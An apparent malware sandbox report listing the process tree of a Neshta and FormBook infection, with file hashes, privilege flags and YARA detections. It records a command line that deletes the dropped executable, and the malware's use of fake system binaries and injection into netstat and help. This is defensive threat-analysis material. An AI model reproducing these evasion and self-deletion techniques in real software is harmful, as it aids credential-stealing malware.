                                                                                                                        Start time:20:53:16
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\svchost.com
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe'
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:41472 bytes
                                                                                                                        MD5 hash:713C9023AF9454658983BDEEC3B3F4D4
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: SUSP_GIF_Anomalies, Description: Detects files with GIF headers and format anomalies - which means that this image could be an obfuscated file of a different type, Source: 00000005.00000003.395354644.00000000021C4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Windows\svchost.com, Author: Florian Roth
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:17
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:53:21
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe
                                                                                                                        Imagebase:0x400000
                                                                                                                        File size:243189 bytes
                                                                                                                        MD5 hash:4A10F66447AAF017229FF618AAB923E3
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:low

                                                                                                                        General

                                                                                                                        Start time:20:54:05
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                        Imagebase:0xe0000
                                                                                                                        File size:32768 bytes
                                                                                                                        MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        General

                                                                                                                        Start time:20:54:10
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:/c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe'
                                                                                                                        Imagebase:0x2a0000
                                                                                                                        File size:232960 bytes
                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:20:54:11
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                        Wow64 process (32bit):false
                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        Imagebase:0x7ff61de10000
                                                                                                                        File size:625664 bytes
                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Reputation:high

                                                                                                                        General

                                                                                                                        Start time:20:54:47
                                                                                                                        Start date:10/06/2021
                                                                                                                        Path:C:\Windows\SysWOW64\help.exe
                                                                                                                        Wow64 process (32bit):true
                                                                                                                        Commandline:C:\Windows\SysWOW64\help.exe
                                                                                                                        Imagebase:0x10a0000
                                                                                                                        File size:10240 bytes
                                                                                                                        MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                                                                                        Has elevated privileges:true
                                                                                                                        Has administrator privileges:true
                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                        Yara matches:
                                                                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                        Reputation:moderate

                                                                                                                        Disassembly

                                                                                                                        Code Analysis
